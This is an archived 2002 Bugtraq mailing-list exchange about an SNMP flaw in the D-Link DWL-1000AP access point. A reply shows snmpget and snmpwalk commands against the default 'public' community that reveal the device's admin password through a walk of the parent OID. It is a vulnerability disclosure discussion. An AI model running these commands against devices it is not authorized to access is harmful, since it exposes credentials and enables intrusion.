Bugtraq mailing list archives

Re: D-Link DWL-1000AP can be compromised because of SNMP configuration

From: "David" <megor () home com>
Date: Wed, 23 Jan 2002 23:50:14 -0800

The bug in the access point only reveals the password if you call for it by
doing a snmp walk which uses a next request to get the oid instead of
calling it explicitly.  I tried:

#snmpget 192.168.0.10 public enterprises.937.2.1.2.2.0
enterprises.937.2.1.2.2.0 = ""

#snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2.0
enterprises.937.2.1.2.2.0 = ""

Both explicit calls to the oid fail but if I use next to call that oid I get

#snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2
enterprises.937.2.1.2.2.0 = "mypw"

Here is my access point info:
system.sysDescr.0 = D-Link  - WLAN Access Point, Version: 3.2.28  #483 (Aug
23 2001).

----- Original Message -----
From: "Jim" <raxor () dexlink com>
To: <bugtraq () securityfocus com>
Sent: Wednesday, January 23, 2002 11:15 AM
Subject: Re: D-Link DWL-1000AP can be compromised because of SNMP
configuration


In-Reply-To: <20011221192655.6657.qmail () mail securityfocus com>

OID 1.3.6.1.4.1.937.2.1.2.2.0 doesn't seem to exist
on my DWL-1000AP.

Is this a typo ?  Or has this value changed with a
recent firmware update ?

Current thread:

Re: D-Link DWL-1000AP can be compromised because of SNMP configuration Jim (Jan 23)
- Re: D-Link DWL-1000AP can be compromised because of SNMP configuration David (Jan 24)